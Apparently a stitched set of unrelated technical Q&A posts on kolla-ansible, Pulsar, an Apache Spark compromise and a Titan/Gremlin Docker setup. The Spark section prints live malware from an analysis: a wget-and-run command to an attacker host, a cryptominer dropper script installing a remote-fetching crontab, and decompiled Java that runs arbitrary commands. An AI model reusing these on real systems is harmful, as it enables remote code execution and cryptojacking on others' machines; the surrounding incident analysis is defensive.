I have an offline host node which includes (compute node, control node and storage node). This host node was shutdown by accident and can't recover to online. All services about that node are down and enable but I can't set to disable.
So I can't remove the host by:
kolla-ansible -i multinode stop --yes-i-really-really-mean-it --limit node-17
I get this error:
TASK [Gather facts] ********************************************************************************************************************************************************************************************************************
fatal: [node-17]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: connect to host node-17 port 22: Connection timed out", "unreachable": true}
PLAY RECAP *****************************************************************************************************************************************************************************************************************************
node-17 : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0
How can I remove that offline host node? THX.
PS: Why I remove that offline host?
node-14(online) : **manage node which kolla-ansible installed**; compute node, control node and storage node
node-15(online) : compute node, control node and storage node
node-17(offline) : compute node, control node and storage node
osc99 (adding) : compute node, control node and storage node
Because when I deploy a new host(osc99) with (the multinode file had comment the node-17 line):
kolla-ansible -i multinode deploy --limit osc99
kolla-ansible will report error:
TASK [keystone : include_tasks] ********************************************************************************************************************************************************************************************************
included: .../share/kolla-ansible/ansible/roles/keystone/tasks/init_fernet.yml for osc99
TASK [keystone : Waiting for Keystone SSH port to be UP] *******************************************************************************************************************************************************************************
ok: [osc99]
TASK [keystone : Initialise fernet key authentication] *********************************************************************************************************************************************************************************
ok: [osc99 -> node-14]
TASK [keystone : Run key distribution] *************************************************************************************************************************************************************************************************
fatal: [osc99 -> node-14]: FAILED! => {"changed": true, "cmd": ["docker", "exec", "-t", "keystone_fernet", "/usr/bin/fernet-push.sh"], "delta": "0:00:04.006900", "end": "2021-07-12 10:14:05.217609", "msg": "non-zero return code", "rc": 255, "start": "2021-07-12 10:14:01.210709", "stderr": "", "stderr_lines": [], "stdout": "Warning: Permanently added '[node.15]:8023' (ECDSA) to the list of known hosts.\r\r\nssh: connect to host node.17 port 8023: No route to host\r\r\nrsync: connection unexpectedly closed (0 bytes received so far) [sender]\r\nrsync error: unexplained error (code 255) at io.c(235) [sender=3.1.2]", "stdout_lines": ["Warning: Permanently added '[node.15]:8023' (ECDSA) to the list of known hosts.", "", "ssh: connect to host node.17 port 8023: No route to host", "", "rsync: connection unexpectedly closed (0 bytes received so far) [sender]", "rsync error: unexplained error (code 255) at io.c(235) [sender=3.1.2]"]}
NO MORE HOSTS LEFT *********************************************************************************************************************************************************************************************************************
PLAY RECAP *****************************************************************************************************************************************************************************************************************************
osc99 : ok=120 changed=55 unreachable=0 failed=1 skipped=31 rescued=0 ignored=1
How could I fixed this error, this is the main point whether or not I can remove the offline host.
Maybe I could fixed that by change the init_fernet.yml file:
node-14:~$ cat .../share/kolla-ansible/ansible/roles/keystone/tasks/init_fernet.yml
---
- name: Waiting for Keystone SSH port to be UP
wait_for:
host: "{{ api_interface_address }}"
port: "{{ keystone_ssh_port }}"
connect_timeout: 1
register: check_keystone_ssh_port
until: check_keystone_ssh_port is success
retries: 10
delay: 5
- name: Initialise fernet key authentication
become: true
command: "docker exec -t keystone_fernet kolla_keystone_bootstrap {{ keystone_username }} {{ keystone_groupname }}"
register: fernet_create
changed_when: fernet_create.stdout.find('localhost | SUCCESS => ') != -1 and (fernet_create.stdout.split('localhost | SUCCESS => ')[1]|from_json).changed
until: fernet_create.stdout.split()[2] == 'SUCCESS' or fernet_create.stdout.find('Key repository is already initialized') != -1
retries: 10
delay: 5
run_once: True
delegate_to: "{{ groups['keystone'][0] }}"
- name: Run key distribution
become: true
command: docker exec -t keystone_fernet /usr/bin/fernet-push.sh
run_once: True
delegate_to: "{{ groups['keystone'][0] }}"
by changing the delegate_to: "{{ groups['keystone'][0] }}? But I can't implement that.
I'm trying to run a Pulsar DebeziumPostgresSource connector.
This is the command I'm running:
bin/pulsar-admin \
--admin-url https://localhost:8443 \
--auth-plugin org.apache.pulsar.client.impl.auth.AuthenticationToken \
--auth-params file:///pulsar/tokens/broker/token \
--tls-allow-insecure \
source localrun \
--broker-service-url pulsar+ssl://my-pulsar-server:6651 \
--client-auth-plugin org.apache.pulsar.client.impl.auth.AuthenticationToken \
--client-auth-params file:///pulsar/tokens/broker/token \
--tls-allow-insecure \
--source-config-file /pulsar/debezium-config/my-source-config.yaml
Here's the /pulsar/debezium-config/my-source-config.yaml file:
tenant: my-tenant
namespace: my-namespace
name: my-source
topicName: my-topic
archive: connectors/pulsar-io-debezium-postgres-2.6.0-SNAPSHOT.nar
parallelism: 1
configs:
plugin.name: pgoutput
database.hostname: my-db-server
database.port: "5432"
database.user: my-db-user
database.password: my-db-password
database.dbname: my-db
database.server.name: my-db-server-name
table.whitelist: my_schema.my_table
pulsar.service.url: pulsar+ssl://my-pulsar-server:6651/
And here's the output from the command above:
11:47:29.924 [main] INFO org.apache.pulsar.functions.runtime.RuntimeSpawner - my-tenant/my-namespace/my-source-0 RuntimeSpawner starting function
11:47:29.925 [main] INFO org.apache.pulsar.functions.runtime.thread.ThreadRuntime - ThreadContainer starting function with instance config InstanceConfig(instanceId=0, functionId=4073a1d9-1312-4570-981b-6723626e394a, functionVersion=01d5a3a7-c6d7-4f79-8717-403ad1371411, functionDetails=tenant: "my-tenant"
namespace: "my-namespace"
name: "my-source"
className: "org.apache.pulsar.functions.api.utils.IdentityFunction"
autoAck: true
parallelism: 1
source {
className: "org.apache.pulsar.io.debezium.postgres.DebeziumPostgresSource"
configs: "{\"database.user\":\"my-db-user\",\"database.dbname\":\"my-db\",\"database.hostname\":\"my-db-server\",\"database.password\":\"my-db-password\",\"database.server.name\":\"my-db-server-name\",\"plugin.name\":\"pgoutput\",\"database.port\":\"5432\",\"pulsar.service.url\":\"pulsar+ssl://my-pulsar-server:6651/\",\"table.whitelist\":\"my_schema.my_table\"}"
typeClassName: "org.apache.pulsar.common.schema.KeyValue"
}
sink {
topic: "my-topic"
typeClassName: "org.apache.pulsar.common.schema.KeyValue"
}
resources {
cpu: 1.0
ram: 1073741824
disk: 10737418240
}
componentType: SOURCE
, maxBufferedTuples=1024, functionAuthenticationSpec=null, port=39135, clusterName=local, maxPendingAsyncRequests=1000)
11:47:32.552 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ConnectionPool - [[id: 0xf8ffbf24, L:/redacted-ip-l:43802 - R:my-pulsar-server/redacted-ip-r:6651]] Connected to server
11:47:33.240 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ProducerStatsRecorderImpl - Starting Pulsar producer perf with config: {
"topicName" : "my-topic",
"producerName" : null,
"sendTimeoutMs" : 0,
"blockIfQueueFull" : true,
"maxPendingMessages" : 1000,
"maxPendingMessagesAcrossPartitions" : 50000,
"messageRoutingMode" : "CustomPartition",
"hashingScheme" : "Murmur3_32Hash",
"cryptoFailureAction" : "FAIL",
"batchingMaxPublishDelayMicros" : 10000,
"batchingPartitionSwitchFrequencyByPublishDelay" : 10,
"batchingMaxMessages" : 1000,
"batchingMaxBytes" : 131072,
"batchingEnabled" : true,
"chunkingEnabled" : false,
"compressionType" : "LZ4",
"initialSequenceId" : null,
"autoUpdatePartitions" : true,
"multiSchema" : true,
"properties" : {
"application" : "pulsar-source",
"id" : "my-tenant/my-namespace/my-source",
"instance_id" : "0"
}
}
11:47:33.259 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ProducerStatsRecorderImpl - Pulsar client config: {
"serviceUrl" : "pulsar+ssl://my-pulsar-server:6651",
"authPluginClassName" : "org.apache.pulsar.client.impl.auth.AuthenticationToken",
"authParams" : "file:///pulsar/tokens/broker/token",
"authParamMap" : null,
"operationTimeoutMs" : 30000,
"statsIntervalSeconds" : 60,
"numIoThreads" : 1,
"numListenerThreads" : 1,
"connectionsPerBroker" : 1,
"useTcpNoDelay" : true,
"useTls" : true,
"tlsTrustCertsFilePath" : null,
"tlsAllowInsecureConnection" : true,
"tlsHostnameVerificationEnable" : false,
"concurrentLookupRequest" : 5000,
"maxLookupRequest" : 50000,
"maxLookupRedirects" : 20,
"maxNumberOfRejectedRequestPerConnection" : 50,
"keepAliveIntervalSeconds" : 30,
"connectionTimeoutMs" : 10000,
"requestTimeoutMs" : 60000,
"initialBackoffIntervalNanos" : 100000000,
"maxBackoffIntervalNanos" : 60000000000,
"listenerName" : null,
"useKeyStoreTls" : false,
"sslProvider" : null,
"tlsTrustStoreType" : "JKS",
"tlsTrustStorePath" : null,
"tlsTrustStorePassword" : null,
"tlsCiphers" : [ ],
"tlsProtocols" : [ ],
"proxyServiceUrl" : null,
"proxyProtocol" : null
}
11:47:33.418 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ConnectionPool - [[id: 0xab39f703, L:/redacted-ip-l:43806 - R:my-pulsar-server/redacted-ip-r:6651]] Connected to server
11:47:33.422 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ClientCnx - [id: 0xab39f703, L:/redacted-ip-l:43806 - R:my-pulsar-server/redacted-ip-r:6651] Connected through proxy to target broker at my-broker:6651
11:47:33.484 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ProducerImpl - [my-topic] [null] Creating producer on cnx [id: 0xab39f703, L:/redacted-ip-l:43806 - R:my-pulsar-server/redacted-ip-r:6651]
11:48:33.434 [pulsar-client-io-1-1] ERROR org.apache.pulsar.client.impl.ProducerImpl - [my-topic] [null] Failed to create producer: 3 lookup request timedout after ms 30000
11:48:33.438 [pulsar-client-io-1-1] WARN org.apache.pulsar.client.impl.ClientCnx - [id: 0xab39f703, L:/redacted-ip-l:43806 - R:my-pulsar-server/redacted-ip-r:6651] request 3 timed out after 30000 ms
11:48:33.629 [main] INFO org.apache.pulsar.functions.LocalRunner - RuntimeSpawner quit because of
java.lang.RuntimeException: org.apache.pulsar.client.api.PulsarClientException$TimeoutException: 3 lookup request timedout after ms 30000
at org.apache.pulsar.functions.sink.PulsarSink$PulsarSinkAtMostOnceProcessor.<init>(PulsarSink.java:177) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.functions.sink.PulsarSink$PulsarSinkAtLeastOnceProcessor.<init>(PulsarSink.java:206) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.functions.sink.PulsarSink.open(PulsarSink.java:284) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.functions.instance.JavaInstanceRunnable.setupOutput(JavaInstanceRunnable.java:819) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.functions.instance.JavaInstanceRunnable.setup(JavaInstanceRunnable.java:224) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.functions.instance.JavaInstanceRunnable.run(JavaInstanceRunnable.java:246) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at java.lang.Thread.run(Thread.java:748) ~[?:1.8.0_252]
Caused by: org.apache.pulsar.client.api.PulsarClientException$TimeoutException: 3 lookup request timedout after ms 30000
at org.apache.pulsar.client.api.PulsarClientException.unwrap(PulsarClientException.java:821) ~[org.apache.pulsar-pulsar-client-api-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.client.impl.ProducerBuilderImpl.create(ProducerBuilderImpl.java:93) ~[org.apache.pulsar-pulsar-client-original-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.functions.sink.PulsarSink$PulsarSinkProcessorBase.createProducer(PulsarSink.java:106) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.functions.sink.PulsarSink$PulsarSinkAtMostOnceProcessor.<init>(PulsarSink.java:174) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
... 6 more
11:48:59.956 [function-timer-thread-5-1] ERROR org.apache.pulsar.functions.runtime.RuntimeSpawner - my-tenant/my-namespace/my-source-java.lang.RuntimeException: org.apache.pulsar.client.api.PulsarClientException$TimeoutException: 3 lookup request timedout after ms 30000 Function Container is dead with exception.. restarting
As you can see, it failed to create a producer due to a TimeoutException. What are the likely causes of this error? What's the best way to further investigate this issue?
Additional info:
I have also tried the --tls-trust-cert-path /my/ca-certificates.crt option instead of --tls-allow-insecure, but got the same error.
I am able to list tenants:
bin/pulsar-admin \
--admin-url https://localhost:8443 \
--auth-plugin org.apache.pulsar.client.impl.auth.AuthenticationToken \
--auth-params file:///pulsar/tokens/broker/token \
tenants list
# Output:
# "public"
# "pulsar"
# "my-topic"
But I am not able to get an OK broker health-check:
bin/pulsar-admin \
--admin-url https://localhost:8443 \
--auth-plugin org.apache.pulsar.client.impl.auth.AuthenticationToken \
--auth-params file:///pulsar/tokens/broker/token \
brokers healthcheck
# Output:
# null
# Reason: java.util.concurrent.TimeoutException
bin/pulsar-admin \
--admin-url https://localhost:8443 \
--auth-plugin org.apache.pulsar.client.impl.auth.AuthenticationToken \
--auth-params file:///pulsar/tokens/broker/token \
--tls-allow-insecure \
brokers healthcheck
# Output:
# HTTP 500 Internal Server Error
# Reason: HTTP 500 Internal Server Error
In my case, the root cause was an expired TLS certificate.
After a lot search and research, I turn to find help here.
The problem is that once a Spark cluster is built(one master and 4 workers with different IP address), each executor will submit "driver" constantly. From web UI, I can see a class named "Exploit" submitted with the "driver". web UI
Following is head and tail of log file of one worker.
Launch Command: "/usr/lib/jvm/jdk1.8/jre/bin/java" "-cp" "/home/labuser/spark/conf/:/home/labuser/spark/jars/*" "-Xmx1024M" "-Dspark.eventLog.enabled=true" "-Dspark.driver.supervise=false" "-Dspark.submit.deployMode=cluster" "-Dspark.app.name=Exploit" "-Dspark.jars=http://192.99.142.226:8220/Exploit.jar" "-Dspark.master=spark://129.10.58.200:7077" "org.apache.spark.deploy.worker.DriverWrapper" "spark://Worker#129.10.58.202:44717" "/home/labuser/spark/work/driver-20180815111311-0065/Exploit.jar" "Exploit" "wget -O /var/tmp/a.sh http://192.99.142.248:8220/cron5.sh,bash /var/tmp/a.sh
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.allocator.type: unpooled
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.threadLocalDirectBufferSize: 65536
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.maxThreadLocalCharBufferSize: 16384
18/08/15 11:13:56 DEBUG NetUtil: Loopback interface: lo (lo, 0:0:0:0:0:0:0:1%lo)
18/08/15 11:13:56 DEBUG NetUtil: /proc/sys/net/core/somaxconn: 128
18/08/15 11:13:57 DEBUG TransportServer: Shuffle server started on port: 46034
18/08/15 11:13:57 INFO Utils: Successfully started service 'Driver' on port 46034.
18/08/15 11:13:57 INFO WorkerWatcher: Connecting to worker spark://Worker#129.10.58.202:44717
18/08/15 11:13:58 DEBUG TransportClientFactory: Creating new connection to /129.10.58.202:44717
18/08/15 11:13:59 DEBUG AbstractByteBuf: -Dio.netty.buffer.bytebuf.checkAccessible: true
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.level: simple
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.maxRecords: 4
18/08/15 11:13:59 DEBUG ResourceLeakDetectorFactory: Loaded default ResourceLeakDetector: io.netty.util.ResourceLeakDetector#350d33b5
18/08/15 11:14:00 DEBUG TransportClientFactory: Connection to /129.10.58.202:44717 successful, running bootstraps...
18/08/15 11:14:00 INFO TransportClientFactory: Successfully created connection to /129.10.58.202:44717 after 1706 ms (0 ms spent in bootstraps)
18/08/15 11:14:00 INFO WorkerWatcher: Successfully connected to spark://Worker#129.10.58.202:44717
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxCapacity.default: 32768
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxSharedCapacityFactor: 2
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.linkCapacity: 16
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.ratio: 8
I found there is a "Exploit" code which hacks Spark cluster by taking advantage of the fact that anyone can submit applications to an unauthorized Spark cluster.
ARBITRARY CODE EXECUTION IN UNSECURED APACHE SPARK CLUSTER
But I don't think my cluster is hacked. Cause after applying authorized mode, this problem still exists.
My question is anyone else have this problem? And why would this happen?
THIS IS VERY ALARMING!
Firstly, the decompiled source code shows that the driver will execute commands supplied to it via arguments. In your case, this wget to download the script to temp, then execute it.
The downloaded script downloads a jpg and piped to bash. THIS IS NOT AN IMAGE
wget -q -O - http://192.99.142.248:8220/logo10.jpg | bash -sh
logo10.jpg contains a cron job that contains even more source code that will be run on your cluster. You are probably seeing this job being submitted because it is starting a scheduled job.
#!/bin/sh
ps aux | grep -vw sustes | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w sustes |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
wget -O /var/tmp/config.json http://192.99.142.248:8220/3.json
wget -O /var/tmp/sustes http://192.99.142.248:8220/rig
chmod 777 /var/tmp/sustes
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sustes -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."
Decompiled Source
public class Exploit {
public Exploit() {
}
public static void main(String[] var0) throws Exception {
String[] var1 = var0[0].split(",");
String[] var2 = var1;
int var3 = var1.length;
for(int var4 = 0; var4 < var3; ++var4) {
String var5 = var2[var4];
System.out.println(var5);
System.out.println(executeCommand(var5.trim()));
System.out.println("==============================================");
}
}
private static String executeCommand(String var0) {
StringBuilder var1 = new StringBuilder();
try {
Process var2 = Runtime.getRuntime().exec(var0);
var2.waitFor();
BufferedReader var3 = new BufferedReader(new InputStreamReader(var2.getInputStream()));
String var4;
while((var4 = var3.readLine()) != null) {
var1.append(var4).append("\n");
}
} catch (Exception var5) {
var5.printStackTrace();
}
return var1.toString();
}
}
Abstract
I'm trying to set up a Titan/Cassandra/Gremlin-Server stack in Docker (v1.13.0). The problem I'm facing is that applications trying to connect to Gremlin-Server on the default port 8182 are reporting errors (details below).
First, here is some relevant version information:
Cassandra v2.2.8
Titan v1.0.0 (Hadoop 1)
Gremlin 3.2.3
Setup
Setup takes place in a Dockerfile in order to be reproducible. It assumes that a Cassandra container already exists, running a cassandra.yaml in which start_rpc has been set to true.
The Dockerfile is as follows:
FROM openjdk:alpine
ENV TITAN 'titan-1.0.0-hadoop1'
RUN apk update && apk add bash unzip && rm -rf /var/cache/apk/* \
&& adduser -S -s /bin/bash -D srg \
&& wget -O /tmp/$TITAN.zip http://s3.thinkaurelius.com/downloads/titan/$TITAN.zip \
&& unzip /tmp/$TITAN.zip -d /opt && ln -s /opt/$TITAN /opt/titan \
&& rm /tmp/*.zip \
&& chown -R srg /opt/$TITAN/ \
&& /opt/titan/bin/gremlin-server.sh -i org.apache.tinkerpop gremlin-python 3.2.3
COPY conf/gremlin-server/* /opt/$TITAN/conf/gremlin-server/
USER srg
WORKDIR /opt/titan
EXPOSE 8182
CMD ["bin/gremlin-server.sh", "conf/gremlin-server/srg.yaml"]
The astute reader will note that I am copying custom configuration files into the container, namely a Gremlin-Server configuration file (srg.yaml) and a titan graph properties file (srg.properties).
srg.yaml
host: localhost
port: 8182
threadPoolWorker: 1
gremlinPool: 8
scriptEvaluationTimeout: 30000
serializedResponseTimeout: 30000
channelizer: org.apache.tinkerpop.gremlin.server.channel.WebSocketChannelizer
graphs: {
graph: conf/gremlin-server/srg.properties
}
plugins:
- aurelius.titan
scriptEngines: {
gremlin-groovy: {
imports: [java.lang.Math],
staticImports: [java.lang.Math.PI],
scripts: [scripts/empty-sample.groovy]},
gremlin-jython: {},
gremlin-python: {},
nashorn: {
imports: [java.lang.Math],
staticImports: [java.lang.Math.PI]}}
serializers:
- { className: org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0, config: { useMapperFromGraph: graph }}
- { className: org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0, config: { serializeResultToString: true }}
- { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerGremlinV1d0, config: { useMapperFromGraph: graph }}
- { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV1d0, config: { useMapperFromGraph: graph }}
processors:
- { className: org.apache.tinkerpop.gremlin.server.op.session.SessionOpProcessor, config: { sessionTimeout: 28800000 }}
metrics: {
consoleReporter: {enabled: true, interval: 180000},
csvReporter: {enabled: true, interval: 180000, fileName: /tmp/gremlin-server-metrics.csv},
jmxReporter: {enabled: true},
slf4jReporter: {enabled: true, interval: 180000},
gangliaReporter: {enabled: false, interval: 180000, addressingMode: MULTICAST},
graphiteReporter: {enabled: false, interval: 180000}}
threadPoolBoss: 1
maxInitialLineLength: 4096
maxHeaderSize: 8192
maxChunkSize: 8192
maxContentLength: 65536
maxAccumulationBufferComponents: 1024
resultIterationBatchSize: 64
writeBufferLowWaterMark: 32768
writeBufferHighWaterMark: 65536
ssl: {
enabled: false}
srg.properties
gremlin.graph=com.thinkaurelius.titan.core.TitanFactory
storage.backend=cassandrathrift
storage.hostname=cassandra # refers to the linked container
cache.db-cache = true
cache.db-cache-clean-wait = 20
cache.db-cache-time = 180000
cache.db-cache-size = 0.25
# Start elasticsearch inside the Titan JVM
index.search.backend=elasticsearch
index.search.directory=db/es
index.search.elasticsearch.client-only=false
index.search.elasticsearch.local-mode=true
Execution
The container is run with the following command: docker run -ti --rm=true --link test.cassandra:cassandra -p 8182:8182 titan.
Here is the log output for Gremlin-Server:
0 [main] INFO org.apache.tinkerpop.gremlin.server.GremlinServer -
\,,,/
(o o)
-----oOOo-(3)-oOOo-----
297 [main] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Configuring Gremlin Server from conf/gremlin-server/srg.yaml
439 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics ConsoleReporter configured with report interval=180000ms
448 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics CsvReporter configured with report interval=180000ms to fileName=/tmp/gremlin-server-metrics.csv
557 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics JmxReporter configured with domain= and agentId=
561 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics Slf4jReporter configured with interval=180000ms and loggerName=org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics
1750 [main] INFO com.thinkaurelius.titan.core.util.ReflectiveConfigOptionLoader - Loaded and initialized config classes: 12 OK out of 12 attempts in PT0.148S
1972 [main] INFO com.thinkaurelius.titan.diskstorage.cassandra.thrift.CassandraThriftStoreManager - Closed Thrift connection pooler.
1990 [main] INFO com.thinkaurelius.titan.graphdb.configuration.GraphDatabaseConfiguration - Generated unique-instance-id=ac1100031-ad2d5ffa52e81
2026 [main] INFO com.thinkaurelius.titan.diskstorage.Backend - Configuring index [search]
2386 [main] INFO org.elasticsearch.node - [Lunatik] version[1.5.1], pid[1], build[5e38401/2015-04-09T13:41:35Z]
2387 [main] INFO org.elasticsearch.node - [Lunatik] initializing ...
2399 [main] INFO org.elasticsearch.plugins - [Lunatik] loaded [], sites []
6471 [main] INFO org.elasticsearch.node - [Lunatik] initialized
6472 [main] INFO org.elasticsearch.node - [Lunatik] starting ...
6477 [main] INFO org.elasticsearch.transport - [Lunatik] bound_address {local[1]}, publish_address {local[1]}
6507 [main] INFO org.elasticsearch.discovery - [Lunatik] elasticsearch/u2StmRW1RsyEHw561yoNFw
6519 [elasticsearch[Lunatik][clusterService#updateTask][T#1]] INFO org.elasticsearch.cluster.service - [Lunatik] master {new [Lunatik][u2StmRW1RsyEHw561yoNFw][ad2d5ffa52e8][local[1]]{local=true}}, removed {[Lunatik][kKyL9UE-R123LLZTTrsVCw][ad2d5ffa52e8][local[1]]{local=true},}, reason: local-disco-initial_connect(master)
6908 [main] INFO org.elasticsearch.http - [Lunatik] bound_address {inet[/0:0:0:0:0:0:0:0:9200]}, publish_address {inet[/172.17.0.3:9200]}
6909 [main] INFO org.elasticsearch.node - [Lunatik] started
6923 [elasticsearch[Lunatik][clusterService#updateTask][T#1]] INFO org.elasticsearch.gateway - [Lunatik] recovered [0] indices into cluster_state
7486 [elasticsearch[Lunatik][clusterService#updateTask][T#1]] INFO org.elasticsearch.cluster.metadata - [Lunatik] [titan] creating index, cause [api], templates [], shards [5]/[1], mappings []
8075 [main] INFO com.thinkaurelius.titan.diskstorage.Backend - Initiated backend operations thread pool of size 4
8241 [main] INFO com.thinkaurelius.titan.diskstorage.Backend - Configuring total store cache size: 94787290
8641 [main] INFO com.thinkaurelius.titan.diskstorage.log.kcvs.KCVSLog - Loaded unidentified ReadMarker start time 2017-01-21T16:31:28.750Z into com.thinkaurelius.titan.diskstorage.log.kcvs.KCVSLog$MessagePuller#3520958b
8642 [main] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Graph [graph] was successfully configured via [conf/gremlin-server/srg.properties].
8643 [main] INFO org.apache.tinkerpop.gremlin.server.util.ServerGremlinExecutor - Initialized Gremlin thread pool. Threads in pool named with pattern gremlin-*
14187 [main] INFO com.jcabi.manifests.Manifests - 108 attributes loaded from 264 stream(s) in 185ms, 108 saved, 3371 ignored: ["Agent-Class", "Ant-Version", "Archiver-Version", "Bnd-LastModified", "Boot-Class-Path", "Build-Date", "Build-Host", "Build-Id", "Build-Java-Version", "Build-Jdk", "Build-Job", "Build-Number", "Build-Time", "Build-Timestamp", "Build-Version", "Built-At", "Built-By", "Built-OS", "Built-On", "Built-Status", "Bundle-ActivationPolicy", "Bundle-Activator", "Bundle-BuddyPolicy", "Bundle-Category", "Bundle-ClassPath", "Bundle-Classpath", "Bundle-Copyright", "Bundle-Description", "Bundle-DocURL", "Bundle-License", "Bundle-Localization", "Bundle-ManifestVersion", "Bundle-Name", "Bundle-NativeCode", "Bundle-RequiredExecutionEnvironment", "Bundle-SymbolicName", "Bundle-Vendor", "Bundle-Version", "Can-Redefine-Classes", "Change", "Class-Path", "Created-By", "DynamicImport-Package", "Eclipse-AutoStart", "Eclipse-BuddyPolicy", "Eclipse-SourceReferences", "Embed-Dependency", "Embedded-Artifacts", "Export-Package", "Extension-Name", "Extension-name", "Fragment-Host", "Git-Commit-Branch", "Git-Commit-Date", "Git-Commit-Hash", "Git-Committer-Email", "Git-Committer-Name", "Gradle-Version", "Gremlin-Lib-Paths", "Gremlin-Plugin-Dependencies", "Gremlin-Plugin-Paths", "Ignore-Package", "Implementation-Build", "Implementation-Build-Date", "Implementation-Title", "Implementation-URL", "Implementation-Vendor", "Implementation-Vendor-Id", "Implementation-Version", "Import-Package", "Include-Resource", "JCabi-Build", "JCabi-Date", "JCabi-Version", "Java-Vendor", "Java-Version", "Main-Class", "Main-class", "Manifest-Version", "Maven-Version", "Module-Email", "Module-Origin", "Module-Owner", "Module-Source", "Originally-Created-By", "Os-Arch", "Os-Name", "Os-Version", "Package", "Premain-Class", "Private-Package", "Require-Bundle", "Require-Capability", "Scm-Connection", "Scm-Revision", "Scm-Url", "Specification-Title", "Specification-Vendor", "Specification-Version", "Tool", "X-Compile-Source-JDK", "X-Compile-Target-JDK", "hash", "implementation-version", "mode", "package", "url", "version"]
14842 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded gremlin-jython ScriptEngine
15540 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded nashorn ScriptEngine
16076 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded gremlin-python ScriptEngine
16553 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded gremlin-groovy ScriptEngine
17410 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.GremlinExecutor - Initialized gremlin-groovy ScriptEngine with scripts/empty-sample.groovy
17410 [main] INFO org.apache.tinkerpop.gremlin.server.util.ServerGremlinExecutor - Initialized GremlinExecutor and configured ScriptEngines.
17419 [main] INFO org.apache.tinkerpop.gremlin.server.util.ServerGremlinExecutor - A GraphTraversalSource is now bound to [g] with graphtraversalsource[standardtitangraph[cassandrathrift:[cassandra]], standard]
17565 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/vnd.gremlin-v1.0+gryo with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0
17566 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/vnd.gremlin-v1.0+gryo-stringd with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0
17808 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/vnd.gremlin-v1.0+json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerGremlinV1d0
17811 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV1d0
17958 [gremlin-server-boss-1] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.
17959 [gremlin-server-boss-1] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Channel started at port 8182.
